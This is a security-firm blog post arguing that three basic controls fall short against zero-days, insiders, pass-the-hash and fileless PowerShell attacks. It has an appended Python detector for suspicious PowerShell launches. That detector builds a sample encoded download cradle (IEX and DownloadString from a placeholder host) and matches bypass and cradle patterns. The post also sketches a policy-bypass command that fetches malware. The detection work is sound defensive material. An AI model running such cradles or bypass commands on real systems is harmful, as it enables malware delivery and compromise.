SCIS Security
Jul 21, 2017 · 4 min read

While we agree the 3 basics are a necessary part of any successful security operation or program, we have some counter thoughts. These aren’t meant to be the silver bullet that changes your view that cyber sec is “b.s.”, but we hope they clarify why there is so much more going on than any one IT professional sees. To answer your question: yes, our products and services “work” without the 3 basics being done, because what we, and many others, offer is hunting, analysis, and incident response. Any good security professional will tell you that defense has to be built in layers. Prevention appears to be the primary focus of your mitigation. But no matter how good you think you are (patched up, no one getting phished, hosts removed and hardened), you aren’t going to stop 0-day vulnerabilities with black-market exploits, and even with appropriate hardening and monitoring of authentication, how do you stop the insider who performs attacks under the radar with legitimate access? What happens when a legitimate user who never clicked a phish, on a fully patched machine with fully patched software, gets hit by an automated 0-day exploit kit served from a legitimate website’s CDN, and the payload executes on their machine, resulting in a compromise followed by encrypted data exfiltration? The user was patched and AV was updated; from an ops perspective they didn’t do anything wrong, and the credential store wasn’t used; the exploit simply runs with the system privileges that the foobar exploit gives it. That’s just one use case (part of the standard attacker kill chain, and a common one) where the 3 basics simply aren’t enough.

Patching — Sure, there is lots of low-hanging fruit there. Lower-skilled pen testers used to eat up MS08-067 all day long on pre-Win7 systems, and even now, after the Wikileaks leak of EternalBlue. However, the EternalBlue vuln was a 0-day and wasn’t disclosed by anyone until the leaks. Microsoft had to scramble to create the patch, and then customers had to QA it and scramble to patch across large enterprises, hoping that no one got to them first before the patch even landed. The point is, 0-day vulnerabilities and exploits, whether client-side (application interaction required) or service-side (usually remote exploits), cannot all be fixed with patches. Some vendors simply refuse to create patches, and critical infrastructure, including hospitals, has to rely on legacy equipment to function; guess what, the vendor probably isn’t going to create a patch for that either. Basic infrastructure such as an IPS helps with that, but yes, many IPS vendors are overpriced. There are free and cheap alternatives that IT administrators can use to mitigate.

Social Engineering — Security awareness is a big deal: yes, be skeptical and verify the other side before taking action. We have no argument that this is a necessary campaign every organization needs. Still, you’ll often find that many organizations lack the resources to reach 100% when sending out phishing and fraud-call simulations.

Authentication Security — Guarding credentials, closing ports, removing unnecessary services, system hardening, etc. (This is really more than one issue from a technical perspective.) Let’s say you use secure password vaults, don’t get owned in a compromise, and you use strong encryption at rest and on the wire. What happens when a legitimate user does something intentionally wrong? Insider threat is still part of a serious cyber security program. Secure password/token negotiation, auth, and escrows can only get you so far. Take Windows, for example: the reason pen testers use pass-the-hash is that, from an architecture standpoint, stopping pass-the-hash isn’t directly possible, because that is how Windows performs many of its transparent authentications and integrations. Check out the problems of pass-the-hash and NTLM (v1 or v2 protocol, it doesn’t matter). The alternative would be credentials that are single-purpose only, with no two hosts ever sharing credentials on the network; imagine how many service accounts and IT admin rescue accounts would be affected. Also note that multi-factor authentication helps, but that is considered part of cyber security.

The point we’re trying to get across is that while your 3 basics are a good start, they’re not enough. There are so many other aspects of cyber security that require attention beyond the fundamentals; for example, script-based fileless malware such as PowerShell: patching doesn’t really help with that, guarding credentials doesn’t stop execution under a local privileged account, and social engineering campaigns don’t stop it either. It could get onto the host and be executed in any number of ways that bypass your 3 basics. For instance, an external attacker (not an insider) gets onto the network via a VLAN hop and then sets up a man-in-the-middle attack where network traffic is manipulated to do something else, e.g. instead of a request to execute foo.exe it becomes a request to execute fileless malware: powershell.exe -policy bypass (insert a combination of encoded/unencoded cmdlets here to pull down malware or perform devious built-in tasks). Again, no patch, no credential guarding, and no anti-phishing mentality could’ve stopped it. Now, you could argue that system hardening and proper configuration could potentially have stopped it, but again, that goes back to good cyber security: defense in layers, not just the 3 basics.

Also note that cyber security, as mentioned previously, includes monitoring and response, not to mention research. How can a vendor patch against something unless there are cyber security researchers finding vulnerabilities and reporting them responsibly? How can you tell when an IT person made a mistake or did something malicious? I would think cyber security analysts with forensic skills can help with that. But you would also need cyber security monitoring through logs, packets, decryption, etc. to be able to determine that. Far more than the proposed 3 basics.
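As an added example (not from the original post or from SCIS Security), here is the kind of log monitoring the last two paragraphs argue for: a small Python detector that flags the PowerShell launch described above (execution-policy bypass, hidden window, an encoded command that decodes to a download cradle, an Office parent process) in constructed process-creation events. The JSON field names, the placeholder URL and the sample events are assumptions; the flags matched are the real powershell.exe parameter names rather than the "-policy bypass" shorthand in the text.

```python
import base64
import json
import re

# Constructed sample payload of the kind the text describes; the URL is a placeholder, not an indicator.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")  # -EncodedCommand is base64 over UTF-16LE

# Constructed process-creation events; the Sysmon/4688-style field names are an assumption.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LINES = [json.dumps(e) for e in [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand " + ENCODED},
]]

PS_IMAGE = re.compile(r"\\powershell(?:_ise)?\.exe$", re.I)
OFFICE_PARENT = re.compile(r"\\(?:winword|excel|powerpnt|outlook)\.exe$", re.I)
# powershell.exe accepts unambiguous parameter prefixes, so the short forms (-ep, -w, -ec, -e) must match too.
CHECKS = {
    "execution policy bypass": re.compile(r"-(?:ex\w*|ep)\s+bypass", re.I),
    "hidden window": re.compile(r"-w\w*\s+hidden", re.I),
}
ENCODED_ARG = re.compile(r"-(?:enc\w*|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile|net\.webclient|invoke-webrequest|frombase64string", re.I)

def decode_encoded_command(b64: str) -> str:
    """Reverse -EncodedCommand (base64 over UTF-16LE text); return '' if the argument is not valid base64."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""

def analyze_event(line: str) -> list:
    """Return the suspicious traits of one JSON process-creation event ([] for non-PowerShell or clean launches)."""
    ev = json.loads(line)
    if not PS_IMAGE.search(ev.get("Image", "")):
        return []
    cmd = ev.get("CommandLine", "")
    findings = [label for label, rx in CHECKS.items() if rx.search(cmd)]
    m = ENCODED_ARG.search(cmd)
    if m:  # decode instead of alerting on the base64 alone: encoded commands are also used by benign scheduled tasks
        findings.append("encoded command")
        if CRADLE_RE.search(decode_encoded_command(m.group(1))):
            findings.append("download cradle in decoded command")
    if OFFICE_PARENT.search(ev.get("ParentImage", "")):
        findings.append("spawned by Office application")
    return findings
```

Run against the three constructed events, the first two come back clean and the third raises five findings; in practice the same checks would be applied to forwarded 4688 or Sysmon process-creation events.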

Written by SCIS Security

SCIS Security specializes in: Cyber Security, Surveillance Monitoring, and Integration Services. Veteran Owned and Operated. BBB Accredited.